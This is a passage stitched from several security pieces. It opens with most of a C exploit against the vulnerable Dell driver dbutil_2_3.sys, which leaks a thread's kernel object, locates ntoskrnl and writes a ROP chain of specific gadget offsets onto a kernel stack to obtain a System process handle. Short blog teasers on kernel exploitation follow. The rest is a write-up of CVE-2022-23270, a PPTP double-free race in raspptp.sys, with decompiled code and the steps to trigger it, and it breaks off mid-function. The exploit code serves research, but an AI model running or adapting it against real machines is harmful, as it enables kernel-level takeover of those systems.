	PSYSTEM_HANDLE_INFORMATION out = (PSYSTEM_HANDLE_INFORMATION)malloc(size);

	//
	// Error handling
	//
	if (out == NULL)
	{
		//
		// Bail out
		//
		goto exit;
	}

	//
	// do/while to allocate enough memory necessary for NtQuerySystemInformation
	//
	do
	{
		//
		// Free the previous memory
		//
		free(out);

		//
		// Increment the size
		//
		size = size * 2;

		//
		// Allocate more memory with the updated size
		//
		out = (PSYSTEM_HANDLE_INFORMATION)malloc(size);

		//
		// Error handling
		//
		if (out == NULL)
		{
			//
			// Bail out
			//
			goto exit;
		}

		//
		// Invoke NtQuerySystemInformation
		//
		retValue = NtQuerySystemInformation(
			SystemHandleInformation,
			out,
			(ULONG)size,
			&outSize
		);
	} while (retValue == STATUS_INFO_LENGTH_MISMATCH);

	//
	// Verify the NTSTATUS code which broke the loop is STATUS_SUCCESS
	//
	if (retValue != STATUS_SUCCESS)
	{
		//
		// Is out == NULL? If so, malloc failed and we can't free this memory
		// If it is NOT NULL, we can assume this memory is allocated. Free
		// it accordingly
		//
		if (out != NULL)
		{
			//
			// Free the memory
			//
			free(out);

			//
			// Bail out
			//
			goto exit;
		}

		//
		// Bail out
		//
		goto exit;
	}
	else
	{
		//
		// NtQuerySystemInformation should have succeeded
		// Parse all of the handles, find the current thread handle, and leak the corresponding object
		//
		for (ULONG i = 0; i < out->NumberOfHandles; i++)
		{
			//
			// Store the current object's type number
			// Thread object = 0x8
			//
			DWORD objectType = out->Handles[i].ObjectTypeNumber;

			//
			// Are we dealing with a handle from the current process?
			//
			if (out->Handles[i].ProcessId == GetCurrentProcessId())
			{
				//
				// Is the handle the handle of the "dummy" thread we created?
				//
				if (dummythreadHandle == (HANDLE)out->Handles[i].Handle)
				{
					//
					// Grab the actual KTHREAD object corresponding to the current thread
					//
					ULONG64 kthreadObject = (ULONG64)out->Handles[i].Object;

					//
					// Free the memory
					//
					free(out);

					//
					// Return the KTHREAD object
					//
					return kthreadObject;
				}
			}
		}

		//
		// The "dummy thread" handle was not found; free the buffer before bailing out
		//
		free(out);
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Close the handle to the "dummy thread"
	//
	CloseHandle(
		dummythreadHandle
	);

	//
	// Return the NTSTATUS error
	//
	return (ULONG64)retValue;
}

/**
 * @brief Function used resolve the base address of ntoskrnl.exe.
 * @param Void.
 * @return ntoskrnl.exe base
 */
ULONG64 resolventBase(void)
{
	//
	// Array to receive kernel-mode addresses
	//
	LPVOID* lpImageBase = NULL;

	//
	// Size of the input array
	//
	DWORD cb = 0;

	//
	// Size of the array output (all load addresses).
	//
	DWORD lpcbNeeded = 0;

	//
	// Invoke EnumDeviceDrivers (and have it fail)
	// to receive the needed size of lpImageBase
	//
	EnumDeviceDrivers(
		lpImageBase,
		cb,
		&lpcbNeeded
	);

	//
	// lpcbNeeded should contain needed size
	//
	lpImageBase = (LPVOID*)malloc(lpcbNeeded);

	//
	// Error handling
	//
	if (lpImageBase == NULL)
	{
		//
		// Bail out
		// 
		goto exit;
	}

	//
	// Assign lpcbNeeded to cb (cb needs to be size of the lpImageBase
	// array).
	//
	cb = lpcbNeeded;

	//
	// Invoke EnumDeviceDrivers properly.
	//
	BOOL getAddrs = EnumDeviceDrivers(
		lpImageBase,
		cb,
		&lpcbNeeded
	);

	//
	// Error handling
	//
	if (!getAddrs)
	{
		//
		// Bail out
		//
		goto exit;
	}

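	//
	// The first element of the array is ntoskrnl.exe. Save it and free the array.
	//
	ULONG64 base = (ULONG64)lpImageBase[0];
	free(lpImageBase);
	return base;

//
// Execution reaches here if an error occurs
//
exit:

	//
	// Free the array (free(NULL) is a no-op) and return an error.
	//
	free(lpImageBase);
	return (ULONG64)1;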
}

/**
 * @brief Function used write a ROP chain to the kernel-mode stack
 *
 * This function takes the previously-leaked KTHREAD object of
 * our "dummy thread", extracts the StackBase member of the object
 * and writes the ROP chain to the kernel-mode stack leveraging the
 * write64() function.
 *
 * @param inHandle - A valid handle to the dbutil_2_3.sys.
 * @param dummyThread - A valid handle to our "dummy thread" in order to resume it.
 * @param KTHREAD - The KTHREAD object associated with the "dummy" thread.
 * @param ntBase - The base address of ntoskrnl.exe.
 * @return Result of the operation in the form of a boolean.
 */
BOOL constructROPChain(HANDLE inHandle, HANDLE dummyThread, ULONG64 KTHREAD, ULONG64 ntBase)
{
	//
	// KTHREAD.StackBase = KTHREAD + 0x38
	//
	ULONG64 kthreadstackBase = KTHREAD + 0x38;

	//
	// Dereference KTHREAD.StackBase to leak the stack
	//
	ULONG64 stackBase = read64(inHandle, kthreadstackBase);

	//
	// Error handling
	//
	if (stackBase == (ULONG64)1)
	{
		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Leaked kernel-mode stack: 0x%llx\n", stackBase);

	//
	// Variable to store our target return address for nt!KiApcInterrupt
	//
	ULONG64 retAddr = 0;

	//
	// Leverage the arbitrary read primitive to walk the kernel-mode stack (seven pages = 0x7000).
	// The stack grows towards the lower addresses, so we start just below StackBase (StackBase - 0x8)
	// and stop before reaching StackBase - 0x7000, which isn't necessarily committed.
	//
	for (int i = 0x8; i < 0x7000 - 0x8; i += 0x8)
	{
		//
		// Invoke read64() to dereference the stack
		//
		ULONG64 value = read64(inHandle, stackBase - i);

		//
		// Kernel-mode address?
		//
		if ((value & 0xfffff00000000000) == 0xfffff00000000000)
		{
			//
			// nt!KiApcInterrupt+0x328?
			//
			if (value == ntBase + 0x41b718)
			{
				//
				// Print update
				//
				printf("[+] Leaked target return address of nt!KiApcInterrupt!\n");

				//
				// Store the current value of stackBase - i, which is nt!KiApcInterrupt+0x328
				//
				retAddr = stackBase - i;

				//
				// Break the loop if we find our address
				//
				break;
			}
		}

		//
		// Reset the value
		//
		value = 0;
	}

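	//
	// Error handling (nt!KiApcInterrupt+0x328 was not found on the stack)
	//
	if (retAddr == 0)
	{
		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Stack address: 0x%llx contains nt!KiApcInterrupt+0x328!\n", retAddr);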

	//
	// Handle to the System process
	//
	HANDLE systemprocHandle = NULL;

	//
	// CLIENT_ID
	//
	CLIENT_ID clientId = { 0 };
	clientId.UniqueProcess = ULongToHandle(4);
	clientId.UniqueThread = NULL;

	//
	// Declare OBJECT_ATTRIBUTES
	//
	OBJECT_ATTRIBUTES objAttrs = { 0 };

	//
	// memset the buffer to 0
	//
	memset(&objAttrs, 0, sizeof(objAttrs));

	//
	// Set members
	//
	objAttrs.ObjectName = NULL;
	objAttrs.Length = sizeof(objAttrs);
	
	//
	// Begin ROP chain
	//
	write64(inHandle, retAddr, ntBase + 0xa50296);				// 0x140a50296: pop rcx ; ret ; \x40\x59\xc3 (1 found)
	write64(inHandle, retAddr + 0x8, (ULONG64)&systemprocHandle);	// HANDLE (to receive System process handle)
	write64(inHandle, retAddr + 0x10, ntBase + 0x99493a);		// 0x14099493a: pop rdx ; ret ; \x5a\x46\xc3 (1 found)
	write64(inHandle, retAddr + 0x18, PROCESS_ALL_ACCESS);		// PROCESS_ALL_ACCESS
	write64(inHandle, retAddr + 0x20, ntBase + 0x2e8281);		// 0x1402e8281: pop r8 ; ret ; \x41\x58\xc3 (1 found)
	write64(inHandle, retAddr + 0x28, (ULONG64)&objAttrs);			// OBJECT_ATTRIBUTES
	write64(inHandle, retAddr + 0x30, ntBase + 0x42a123);		// 0x14042a123: pop r9 ; ret ; \x41\x59\xc3 (1 found)
	write64(inHandle, retAddr + 0x38, (ULONG64)&clientId);			// CLIENT_ID
	write64(inHandle, retAddr + 0x40, ntBase + 0x6360a6);		// 0x1406360a6: pop rax ; ret ; \x58\xc3 (1 found)
	write64(inHandle, retAddr + 0x48, ntBase + 0x413210);		// nt!ZwOpenProcess
	write64(inHandle, retAddr + 0x50, ntBase + 0xab533e);		// 0x140ab533e: jmp rax; \x48\xff\xe0 (1 found)
	write64(inHandle, retAddr + 0x58, ntBase + 0xa50296);		// 0x140a50296: pop rcx ; ret ; \x40\x59\xc3 (1 found)
	write64(inHandle, retAddr + 0x60, (ULONG64)dummyThread);	// HANDLE to the dummy thread
	write64(inHandle, retAddr + 0x68, ntBase + 0x99493a);		// 0x14099493a: pop rdx ; ret ; \x5a\x46\xc3 (1 found)
	write64(inHandle, retAddr + 0x70, 0x0000000000000000);		// Set exit code to STATUS_SUCCESS
	write64(inHandle, retAddr + 0x78, ntBase + 0x6360a6);		// 0x1406360a6: pop rax ; ret ; \x58\xc3 (1 found)
	write64(inHandle, retAddr + 0x80, ntBase + 0x4137b0);		// nt!ZwTerminateThread
	write64(inHandle, retAddr + 0x88, ntBase + 0xab533e);		// 0x140ab533e: jmp rax; \x48\xff\xe0 (1 found)
	
	//
	// Resume the thread to kick off execution
	//
	ResumeThread(dummyThread);

	//
	// Sleep Project2.exe for 1 second to allow the print update
	// to accurately display the System process handle
	//
	Sleep(1000);

	//
	// Print update
	//
	printf("[+] System process HANDLE: 0x%p\n", systemprocHandle);

	//
	// The ROP chain was written and the thread resumed
	//
	return TRUE;

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return FALSE (the ROP chain could not be constructed)
	//
	return FALSE;
}

/**
 * @brief Exploit entry point.
 * @param Void.
 * @return Success (0) or failure (1).
 */
int main(void)
{
	//
	// Invoke getHandle() to get a handle to dbutil_2_3.sys
	//
	HANDLE driverHandle = getHandle();

	//
	// Error handling
	//
	if (driverHandle == (HANDLE)-1)
	{
		//
		// Print update
		//
		printf("[-] Error! Couldn't get a handle to dbutil_2_3.sys. Error: 0x%lx\n", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Obtained a handle to dbutil_2_3.sys! HANDLE value: %p\n", driverHandle);

	//
	// Invoke createdummyThread() to create our "dummy thread"
	//
	HANDLE getthreadHandle = createdummyThread();

	//
	// Error handling
	//
	if (getthreadHandle == (HANDLE)-1)
	{
		//
		// Print update
		//
		printf("[-] Error! Couldn't create the \"dummy thread\". Error: 0x%lx\n", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Created the \"dummy thread\"!\n");

	//
	// Invoke leakKTHREAD()
	//
	ULONG64 kthread = leakKTHREAD(getthreadHandle);

	//
	// Error handling (leakKTHREAD() returns an NTSTATUS cast to ULONG64 on failure.
	// A negative NTSTATUS is sign-extended to 0xffffffffXXXXXXXX)
	//
	if ((kthread >> 32) == 0xffffffff)
	{
		//
		// Print update
		// kthread is an NTSTATUS code if execution reaches here
		//
		printf("[-] Error! Unable to leak the KTHREAD object of the \"dummy thread\". Error: 0x%llx\n", kthread);

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Error handling (kthread isn't a negative NTSTATUS - but is it a kernel-mode address?)
	//
	else if ((kthread & 0xffff800000000000) != 0xffff800000000000)
	{
		//
		// Print update
		// kthread is not a kernel-mode address (e.g. STATUS_SUCCESS if the handle wasn't found)
		//
		printf("[-] Error! Unable to leak the KTHREAD object of the \"dummy thread\". Error: 0x%llx\n", kthread);

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] \"Dummy thread\" KTHREAD object: 0x%llx\n", kthread);

	//
	// Invoke resolventBase() to retrieve the load address of ntoskrnl.exe
	//
	ULONG64 ntBase = resolventBase();

	//
	// Error handling
	//
	if (ntBase == (ULONG64)1)
	{
		//
		// Bail out
		//
		goto exit;
	}

	//
	// Invoke constructROPChain() to build our ROP chain and kick off execution
	//
	BOOL createROP = constructROPChain(driverHandle, getthreadHandle, kthread, ntBase);

	//
	// Error handling
	//
	if (!createROP)
	{
		//
		// Print update
		//
		printf("[-] Error! Unable to construct the ROP chain. Error: 0x%lx\n", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Return success
	//
	return 0;

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return an error
	//
	return 1;
}

Peace, love, and positivity :-).

g_CiOptions in a Virtualized World

With the leaking of code signing certificates and exploits for vulnerable drivers becoming common occurrences, adversaries are adopting the kernel as their new playground. And with Microsoft making technologies like Virtualization Based Security (VBS) and Hypervisor-Protected Code Integrity (HVCI) available, I wanted to take some time to understand just how vulnerable endpoints are when faced with an attacker set on escaping to Ring-0.

HackSys Extreme Vulnerable Driver 3 - Stack Overflow + SMEP Bypass

This post is a writeup of a simple Stack Buffer Overflow in HackSys Extreme Vulnerable Driver (HEVD). We assume that you already have an environment set up to follow along; for reference, this post uses Windows 10 Pro x64 RS1 with HEVD 3.00. If you are not sure how to set up a kernel debugging environment, you can find plenty of posts describing the process online; we will not cover it in this post.

CVE-2022-23270 – Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 2)

Following yesterday’s Microsoft VPN vulnerability, today we’re presenting CVE-2022-23270, which is another Windows VPN Use after Free (UaF) vulnerability that was discovered through reverse engineering and fuzzing the raspptp.sys kernel driver. This presents attackers with another chance to perform denial of service and potentially even achieve remote code execution against a target server.

Affected Versions

The vulnerability affects most versions of Windows Server and Windows Desktop since Windows Server 2008 and Windows 7 respectively. To see a full list of affected Windows versions, check the official disclosure post on MSRC:

The vulnerability affects both server and client use cases of the raspptp.sys driver and can potentially be triggered in both cases. This blog post will focus on triggering the vulnerability against a server target.

Introduction

CVE-2022-23270 depends heavily on the implementation of the Winsock Kernel (WSK) layer in raspptp.sys to be triggered successfully. If you want to learn more about the internals of raspptp.sys and how it interacts with WSK, we suggest you read our write-up for CVE-2022-21972 before continuing:

CVE-2022-23270 is a Use after Free (UaF) resulting in Double Free that occurs as the result of a race condition. It resides in the implementation of PPTP Calls in the raspptp.sys driver.

PPTP implements two sockets: a TCP control connection and a GRE data connection. Calls are set up and managed by the control connection and are used to identify individual data streams handled by the GRE connection. The Call functionality makes it easy for PPTP to multiplex several streams of VPN data over one connection.

Now that we know in simple terms what PPTP calls are, let's see how they can be broken!

The Vulnerability

This section explores the underlying vulnerability.  We will then move on to triggering the vulnerable code on the target.

PPTP Call Context Objects

PPTP calls can be created through an IncomingCallRequest or an OutgoingCallRequest control message. The raspptp.sys driver creates a call context structure when either of these call requests is initiated by a connected PPTP client. The call context structures are used to track information and buffer GRE data for a call connection. For this vulnerability, how raspptp.sys constructs these objects is unimportant; we instead care about how they are accessed.

Accessing the Call Context

There are two ways in which handling a PPTP control message can retrieve a call context structure. Both methods require the client to know the associated call ID for the call context structure. This ID is randomly generated by the server and sent to the client within the reply to the Incoming or Outgoing call request. The client then uses that ID in all subsequent control messages sent to the server that relate to that specific call. See the PPTP RFC (https://datatracker.ietf.org/doc/html/rfc2637) for more information on how this is handled.
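To make the call ID exchange more concrete, here is a minimal C sketch that serialises one of the control messages discussed in this post, an Outgoing-Call-Reply, using the layout in RFC 2637: a 12-byte control header (length, PPTP message type 1, magic cookie 0x1A2B3C4D, control message type, reserved) followed by the call fields, all big-endian. The helper names are our own illustration; this is not code from raspptp.sys or from the authors' PoC.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PPTP_MSG_TYPE_CONTROL         1u          /* PPTP Message Type: control */
#define PPTP_MAGIC_COOKIE             0x1A2B3C4Du
#define PPTP_CTRL_OUTGOING_CALL_REPLY 8u          /* Control Message Type 8 */
#define PPTP_OUTGOING_CALL_REPLY_LEN  32u

static void put_be16(uint8_t *p, uint16_t v)
{
    p[0] = (uint8_t)(v >> 8);
    p[1] = (uint8_t)v;
}

static void put_be32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v >> 24);
    p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);
    p[3] = (uint8_t)v;
}

/* 12-byte header shared by every PPTP control message. */
static void pptp_put_ctrl_header(uint8_t *buf, uint16_t total_len, uint16_t ctrl_type)
{
    put_be16(buf + 0, total_len);
    put_be16(buf + 2, PPTP_MSG_TYPE_CONTROL);
    put_be32(buf + 4, PPTP_MAGIC_COOKIE);
    put_be16(buf + 8, ctrl_type);
    put_be16(buf + 10, 0);                        /* Reserved0 */
}

/* Serialises an Outgoing-Call-Reply; returns bytes written, or 0 if buf is too small. */
static size_t pptp_build_outgoing_call_reply(uint8_t *buf, size_t cap,
                                             uint16_t call_id, uint16_t peer_call_id,
                                             uint8_t result_code, uint8_t error_code)
{
    assert(buf != NULL);
    if (cap < PPTP_OUTGOING_CALL_REPLY_LEN)
        return 0;
    pptp_put_ctrl_header(buf, PPTP_OUTGOING_CALL_REPLY_LEN, PPTP_CTRL_OUTGOING_CALL_REPLY);
    put_be16(buf + 12, call_id);
    put_be16(buf + 14, peer_call_id);
    buf[16] = result_code;                        /* 1 = Connected, 2..7 = failure reasons */
    buf[17] = error_code;
    put_be16(buf + 18, 0);                        /* Cause Code */
    put_be32(buf + 20, 0);                        /* Connect Speed */
    put_be16(buf + 24, 0);                        /* Packet Recv. Window Size */
    put_be16(buf + 26, 0);                        /* Packet Processing Delay */
    put_be32(buf + 28, 0);                        /* Physical Channel ID */
    return PPTP_OUTGOING_CALL_REPLY_LEN;
}
```

Every call-related control message carries the call IDs at fixed offsets like this, which is how the server side maps an incoming message back to a call context.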

raspptp.sys uses two methods to access the call context structures when parsing control messages:

  • Globally accessible Call ID indexed array.
  • Linked list stored in the PPTP control connection context.

The difference between these two access methods is scope. The global array can retrieve any call allocated by any control connection, but the linked list only contains calls relating to the control connection containing it.

Let’s go a bit deeper into these access methods and see if they play nicely together…

Linked List Access

The linked list access method is performed through two functions within raspptp.sys: EnumListEntry, which is used to iterate through each member of the control connection's call linked list, and EnumComplete, which is used to end the current loop and reset state.

while ( 1 )
{
    EnumRecord = EnumListEntry(
    &lpPptpCtlCx->CtlCallDoubleLinkedList,
    (LIST_ENTRY *)&ListIterator,
    &lpPptpCtlCx->pPptpAdapterCtx->PptpAdapterSpinLock);
    if ( !EnumRecord )
        break;
    EnumCallCtx = (CtlCall *)(EnumRecord - 2);
    if ( EnumRecord != (PVOID *)16 && EnumCallCtx->CallAllocTag == 'CPTP' )
        CallEventOutboundTunnelEstablished(EnumCallCtx);
}
Itreator = (LIST_ENTRY *)&ListIterator;
EnumComplete(Itreator, (KSPIN_LOCK)&lpPptpCtlCx->pPptpAdapterCtx->PptpAdapterSpinLock);

The ListIterator variable stores the list entry reached so far, so that the loop can continue from that point on the next call to EnumListEntry. EnumComplete simply resets the ListIterator variable once iteration is finished. The exact shape of this code varies slightly across the raspptp.sys driver, but the overall method is the same: call EnumListEntry repeatedly until it returns NULL, then call EnumComplete to tidy up the iterator.
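The `EnumRecord - 2` and `&ListIterator[-1]` expressions in the decompiled code look like the compiler's rendering of the Windows `CONTAINING_RECORD` pattern: the list node is embedded inside the call context, so the context starts a fixed number of bytes before the node. The `!= 16` comparison appears to be a NULL check on the recovered context once the compiler folds in that offset. The sketch below reproduces the pattern in portable C; the 16-byte offset is inferred from the pseudo code, and the `call_ctx` layout and names are hypothetical. It checks the node pointer for NULL instead, which avoids doing arithmetic on a NULL pointer.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
} list_entry;

/* Portable equivalent of the Windows CONTAINING_RECORD macro. */
#define CONTAINING_RECORD(addr, type, field) \
    ((type *)((char *)(addr) - offsetof(type, field)))

/* Value of the multi-character constant 'CPTP' as MSVC evaluates it. */
#define CALL_ALLOC_TAG 0x43505450u

/* Hypothetical layout: 16 bytes of other fields, then the embedded list node. */
typedef struct call_ctx {
    uint64_t other_fields[2];
    list_entry link;
    uint32_t alloc_tag;
    uint32_t call_id;
} call_ctx;

_Static_assert(offsetof(call_ctx, link) == 16, "node sits 16 bytes into the context");

/* Recover the owning call context from a list node, rejecting NULL and bad tags. */
static call_ctx *entry_to_call(list_entry *entry)
{
    if (entry == NULL)
        return NULL;
    call_ctx *call = CONTAINING_RECORD(entry, call_ctx, link);
    return call->alloc_tag == CALL_ALLOC_TAG ? call : NULL;
}
```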

Global Call Array

The global array access method is handled through a function called CallGetCall:

CtlCall *__fastcall CallGetCall(PptpAdapterContext *AdapterCtx, unsigned __int64 CallId)
{
    PptpAdapterContext *lpAdapterCtx;
    unsigned __int64 lpCallId;
    CtlCall *CallEntry;
    KIRQL curAdaperIRQL;
    unsigned __int64 BaseCallID;
    unsigned __int64 CallIdMaskApplied;

    lpAdapterCtx = AdapterCtx;
    lpCallId = CallId;
    CallEntry = 0i64;
    curAdaperIRQL = KeAcquireSpinLockRaiseToDpc(&AdapterCtx->PptpAdapterSpinLock);
    BaseCallID = (unsigned int)PptpBaseCallId;
    lpAdapterCtx->HandlerIRQL = curAdaperIRQL;
    if ( lpCallId >= BaseCallID && lpCallId < (unsigned int)PptpMaxCallId )
    {
        if ( PptpCallIdMaskSet )
        {
            CallIdMaskApplied = (unsigned int)lpCallId & PptpCallIdMask;
            if ( CallIdMaskApplied < (unsigned int)PptpWanEndpoints )
            {
                CallEntry = lpAdapterCtx->PptpWanEndpointsArray + CallIdMaskApplied;
                if ( CallEntry )
                {
                    if ( CallEntry->PptpWanEndpointFullCallId != lpCallId )
                        CallEntry = 0i64;
                }
            }
        }
        else
        {
            CallEntry = lpAdapterCtx->PptpWanEndpointsArray + lpCallId - BaseCallID;
        }
    }
    KeReleaseSpinLock(&lpAdapterCtx->PptpAdapterSpinLock, curAdaperIRQL);
    return CallEntry;
}

This function effectively just retrieves the array slot that the call context structure should be stored in based on the provided call ID. It then returns the structure at that entry provided that it matches the specified ID and is in fact a valid entry.
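The lookup logic of CallGetCall can be modelled in a few lines. In the sketch below, which is our reading of the pseudo code rather than the driver's source, IDs outside [base, max) are rejected; when a mask is configured, the low bits of the ID select a slot and the full ID stored in that slot must match, so an ID with the right low bits but the wrong high bits is refused. The type and field names are hypothetical stand-ins for PptpWanEndpointsArray, PptpWanEndpoints, PptpBaseCallId, PptpMaxCallId and PptpCallIdMask, and the spin lock is deliberately left out.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-ins for the driver's globals and endpoint array. */
typedef struct call_slot {
    uint64_t full_call_id;          /* full ID recorded when the call was allocated */
} call_slot;

typedef struct call_table {
    call_slot *slots;               /* PptpWanEndpointsArray */
    uint32_t slot_count;            /* PptpWanEndpoints */
    uint32_t base_id;               /* PptpBaseCallId */
    uint32_t max_id;                /* PptpMaxCallId */
    int mask_set;                   /* PptpCallIdMaskSet */
    uint32_t mask;                  /* PptpCallIdMask */
} call_table;

static call_slot *table_get(const call_table *t, uint64_t call_id)
{
    assert(t != NULL && t->slots != NULL);
    if (call_id < t->base_id || call_id >= t->max_id)
        return NULL;                                  /* outside the valid ID range */
    if (t->mask_set) {
        uint32_t idx = (uint32_t)call_id & t->mask;   /* low bits pick the slot */
        if (idx >= t->slot_count)
            return NULL;
        call_slot *slot = &t->slots[idx];
        /* the high bits must match too, so a stale or guessed ID is rejected */
        return slot->full_call_id == call_id ? slot : NULL;
    }
    /* unmasked: the ID is a plain offset from the base, with no further validation */
    return &t->slots[call_id - t->base_id];
}
```

Note that nothing here says who may use the returned slot or for how long; that is exactly the gap discussed next.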

So, what’s the issue? Both of these access methods look pretty harmless, right? There is one subtle and simple issue in the way these access methods are used. Locking!

Cross Thread Access?

CallGetCall is intended to be able to retrieve any call allocated by any currently connected control connection. Since a control connection doesn't care about calls owned by other control connections, the control connection state machine should have no use for CallGetCall, or at least, according to the PPTP RFC, it shouldn't. However, this isn't the case: there are several control connection methods in raspptp.sys that use CallGetCall instead of referencing the internal control connection linked list!

If CallGetCall lets us access other control connection call context structures and certain parts of the PPTP handling can occur concurrently, then we can theoretically access the same call context structure in two different threads at the same time! This is starting to sound like a recipe for some racy memory corruption conditions.

Lock and Roll

Both the linked list access method and the CallGetCall function reference a PptpAdapterSpinLock variable on a global context structure. This is a globally accessible kernel spin lock intended to prevent concurrent access to globally accessible data. Using it should make any concurrent use of either call context access method safe, right?

This isn't the case at all. Looking at the pseudo code above, the lock in CallGetCall is only held while the array is being searched, which is fine for the lookup, but it is not held once the call structure is returned. Unless the caller re-acquires the global lock before using the context structure (spoiler alert: it does not), we have a potential window for unsafe concurrent access.

Concurrent access doesn’t necessarily mean we have a vulnerability. To prove that we have a vulnerability, we need two code locations that could cause a further issue when running with access to the object at the same time. For example, any form of free operation performed on the structure in this scenario could be a good source of an exploitable issue.

Getting Memory Corruption

Within the raspptp.sys driver there are many places where the kind of access we’re looking for can occur and cause different kinds of issues. Going over all of them would probably fill an entire series of blog posts that we can’t imagine anyone really wants. The one we ended up using for the Proof of Concept (PoC) involves the following two operations:

  • Closing a control connection
    • When a control connection is closed, the control connection's call linked list is walked and each call context structure is de-initialised and freed. This operation is performed by a familiar function, CtlpCleanup.
  • Sending an OutgoingCallReply control message with an error code set
    • If an OutgoingCallReply message is sent with an error set, the call structure that it relates to is freed. CallGetCall is used to look up the call context structure when handling this control message, which means we can use it to perform the free while the control connection close routine is running in a separate thread.

These two conditions create a scenario where, if both happen concurrently, a call context structure is freed twice, causing a Use after Free/Double Free issue!

Race Against the Machine!

To trigger the race we need to take the following high level steps:

  • Create two control connections and initialise them so we can create calls.
  • On the first connection, we create the maximum number of calls the server will allow.
  • We then simultaneously close the first connection and start sending OutgoingCallReply messages for the allocated call IDs over the second connection.
    • This realistically needs to be done in separate threads bound to separate CPU cores to guarantee true concurrency.
  • Then we sit back and wait for the race to be won?

In practice, reliably implementing these steps is a lot more difficult than it would initially seem. The window for triggering the race condition and the time we have to do something useful once the initial free occurs are both incredibly small, even in the best case scenario.

However, this does not mean that it cannot be achieved. With a significant amount of effort it is possible to greatly increase the reliability of triggering the vulnerability. There are many different factors that can be played with to build a path towards successful exploitation.

One Lock, Two Lock, Three Lock, Four!

Let’s take a look at the two bits of code we’re hoping to get perfectly aligned and see just how tricky this race condition is actually going to be.

The CtlpCleanup Linked List Iteration

for ( ListIterator = (LIST_ENTRY *)EnumListEntry(
          &lpCtlCtxToCleanup->CtlCallDoubleLinkedList,
          &iteratorState,
          &gAdapter->PptpAdapterSpinLock);
      ListIterator;
      ListIterator = (LIST_ENTRY *)EnumListEntry(
          &lpCtlCtxToCleanup->CtlCallDoubleLinkedList,
          &iteratorState,
          &lpCtlCtxToCleanup->pPptpAdapterCtx->PptpAdapterSpinLock) )
{
    lpCallCtx = (CtlCall *)&ListIterator[-1];
    if ( ListIterator != (LIST_ENTRY *)16 && lpCallCtx->CallAllocTag == 'CPTP' )
    {
        ...
        CallCleanup(lpCallCtx); // this will eventually free the call structure
    }
}

We can see here that the loop is fairly small. The main part we are interested in is the call to CallCleanup that is performed on each call structure in the control context linked list. Unfortunately, this function is not as simple as we would like: it contains a large number of execution paths, any of which could make our race condition harder or easier to exploit. The section most interesting for our PoC is the following pseudo code snippet.

lpIRQL = KeAcquireSpinLockRaiseToDpc(&lpCallToClean->CtlCallSpinLock_A);
lpCallToClean->NdisVcHandle = 0i64;
lpCallToClean->CurIRQL = lpIRQL;
CallDetachFromAdapter(lpCallToClean);
KeReleaseSpinLock(&lpCallToClean->CtlCallSpinLock_A, lpCallToClean->CurIRQL);
if ( ... )
{
    CtlDisconnectCall(lpCallToClean);
    CallpCancelCallTimers(lpCallToClean);
    DereferenceRefCount(lpCallToClean); // Decrement from Ctl loop
    lpCallToClean->CurIRQL = KeAcquireSpinLockRaiseToDpc(&lpCallToClean->CtlCallSpinLock_A);
}
...
KeReleaseSpinLock(&lpCallToClean->CtlCallSpinLock_A, lpCallToClean->CurIRQL);
return DereferenceRefCount(lpCallToClean); // Freeing decrement

Here, a set of detach operations is performed to remove the call structure from the lists it's stored in and to decrease its internal reference count appropriately. A side effect of this detach phase is that the call context structure is removed from both the linked list and the global array. This means that if one thread gets too far through freeing a call context structure before the other thread retrieves it from its respective list, the race is already lost. This further adds to the difficulty of getting these two sections of code lined up.

Ultimately, the final call to DereferenceRefCount releases the underlying memory, which in our scenario it does by invoking the call context structure's internal free function pointer, which points to the CallFree function. Before we go over what CallFree does, let's look at the other half of the race condition.

OutgoingCallReply Handling

lpCallOutgoingCallCtx = CallGetCall(lpPptpCtlCx->pPptpAdapterCtx, ReasonCallIdMasked);
if ( lpCallOutgoingCallCtx )
{
    CallEventCallOutReply(lpCallOutgoingCallCtx, lpCtlPayloadBuffer);
}

The preceding pseudo code excerpt is the part of the OutgoingCallReply handling that we will use to access the call context structures from a separate thread. Let’s take a look at the logic in CallEventCallOutReply, which will also free the call context object!

lpCallCtx->CurIRQL = KeAcquireSpinLockRaiseToDpc(&lpCallCtx->CtlCallSpinLock_A);
...
KeReleaseSpinLock(&lpCallCtx->CtlCallSpinLock_A, lpCallCtx->CurIRQL);
if ( OutGoingCallReplyStatusCode )
{
    CallSetState(lpCallCtx, 0xBu, v8, 0);
    CallCleanup(lpCallCtx);
}

This small code snippet from CallEventCallOutReply is the part relevant to our PoC. Effectively, if the status field of the OutgoingCallReply message is set, CallCleanup is called, which again eventually results in CallFree being hit.

CallFree

The CallFree function releases the resources of multiple sub-objects stored in the call context, as well as the call context itself:

void __fastcall CallFree(CtlCall *CallToBeFreed)
{
    CtlCall *lpCallToBeFreed;
    _NET_BUFFER_LIST *v2;
    NDIS_HANDLE v3;
    NDIS_HANDLE v4;
    PNDIS_HANDLE v5;
    PNDIS_HANDLE v6;
    PNDIS_HANDLE v7;

    if ( CallToBeFreed )
    {
        lpCallToBeFreed = CallToBeFreed;
        ...
        v2 = lpCallToBeFreed->CtlNetBufferList_A;
        if ( v2 )
            NdisFreeNetBufferList(v2);
        v3 = lpCallToBeFreed->CtlCallWorkItemHandle_A;
        if ( v3 )
            NdisFreeIoWorkItem(v3);
        v4 = lpCallToBeFreed->CtlCallWorkItemHandle_B;
        if ( v4 )
            NdisFreeIoWorkItem(v4);
        v5 = lpCallToBeFreed->hCtlCallCloseTimeoutTimerObject;
        if ( v5 )
